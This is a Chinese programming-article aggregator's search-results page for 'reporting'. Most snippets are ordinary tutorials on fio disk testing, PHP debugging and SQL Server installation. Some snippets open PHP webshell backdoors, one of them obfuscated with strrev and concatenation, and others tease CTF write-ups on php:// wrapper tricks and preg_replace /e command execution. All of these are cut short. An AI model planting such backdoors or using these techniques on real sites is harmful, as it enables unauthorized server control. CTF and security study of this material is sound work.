码迷,mamicode.com
首页 >  
搜索关键字:reporting    ( 607个结果
linux使用FIO测试磁盘的iops
FIO是测试IOPS的非常好的工具,用来对硬件进行压力测试和验证,支持13种不同的I/O引擎,包括:sync,mmap,libaio,posixaio,SGv3,splice,null,network,syslet,guasi,solarisaio等等。fio官网地址:http://freshmeat.net/projects/fio/一,FIO安装wgethttp://brick.kernel.
分类:系统相关   时间:2020-06-09 09:25:48    阅读次数:111
dedecms开启错误调试模式
在根目录下找到:include/common.inc.php文件 查找代码: error_reporting(E_ALL); 将此代码复制到 if 语句外: 保存之后再次进入管理后台,就可以看到出错提示了! ...
分类:其他好文   时间:2020-06-06 10:47:55    阅读次数:76
SQL Server 2012安装图解
SQL Server 2012 Enterprise Edition安装图解、、、 第一部分:安装前的准备 1.疑问:一个PC上可以安装多个SQL Server数据库么 答案:可以的、每一个安装的时候最好创建一个不同的实例名,安装在不同的文件夹下。我的就是这样安装的,我装了2005、2008、201 ...
分类:数据库   时间:2020-06-02 09:34:29    阅读次数:90
Linux 之 fio工具使用
参考文档:https://www.cnblogs.com/yuhaohao/p/9770701.html命令:fio--filename=/mnt/test_rw--bs=16K--rw=randwrite--size=20G--runtime=300--time_based--ioengine=libaio--iodepth=16--numjobs=2--group_reporting--nam
分类:系统相关   时间:2020-05-26 23:29:02    阅读次数:93
PHP_Code_Challenge 1~30
1. 1wMDEyY2U2YTY0M2NgMTEyZDQyMjAzNWczYjZgMWI4NTt3YWxmY= <?php error_reporting(0); require __DIR__.'/lib.php'; echo base64_encode(hex2bin(strrev(bin2he ...
分类:Web程序   时间:2020-05-19 14:20:52    阅读次数:205
PHP调试总结
调试思路优先级 打开PHP错误提示 在php.ini文件里改变display_errors和error_reporting的值,没有的直接加上 注意:E_ALL – 所有的错误和警告(不包括 E_STRICT) PHP文件中加入 检查PHP语法错误 调试技巧 有时候在调试项目的时候,需要将一个对象或 ...
分类:Web程序   时间:2020-05-19 10:35:17    阅读次数:59
【MRCTF2020】EZaduit
扫描发现www.zip和login.php,访问www.zip获得index.php的代码: <?php header('Content-type:text/html; charset=utf-8'); error_reporting(0); if(isset($_POST['login'])){ ...
分类:其他好文   时间:2020-05-17 19:20:29    阅读次数:63
任意文件读取 move_uploaded_file文件上传
任意文件读取 move_uploaded_file文件上传 <?php error_reporting(0);$sr="st"./*+/*+*/"rr"/*+/*+*/."ev";$id=$sr/*+/*+*/("ri"."d_"."si");$rn=$sr/*+/*+*/("em"."an"."e ...
分类:Web程序   时间:2020-05-15 15:27:12    阅读次数:75
evalPHP一句话后门
evalPHP一句话后门 <?php $password='c2.o'; $shellname='BY:FBI'; $myurl='http://www.baidu.com'; error_reporting(E_ERROR | E_PARSE);@set_time_limit(0); ob_sta ...
分类:Web程序   时间:2020-05-15 13:23:16    阅读次数:242
[BJDCTF2020]ZJCTF,不过如此
知识点 php://input filter伪协议 preg_replace() /e模式命令执行题目源码 <?php error_reporting(0); $text = $_GET["text"]; $file = $_GET["file"]; if(isset($text)&&(file_g ...
分类:其他好文   时间:2020-05-14 23:57:50    阅读次数:167
607条   上一页 1 2 3 4 5 6 ... 61 下一页
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!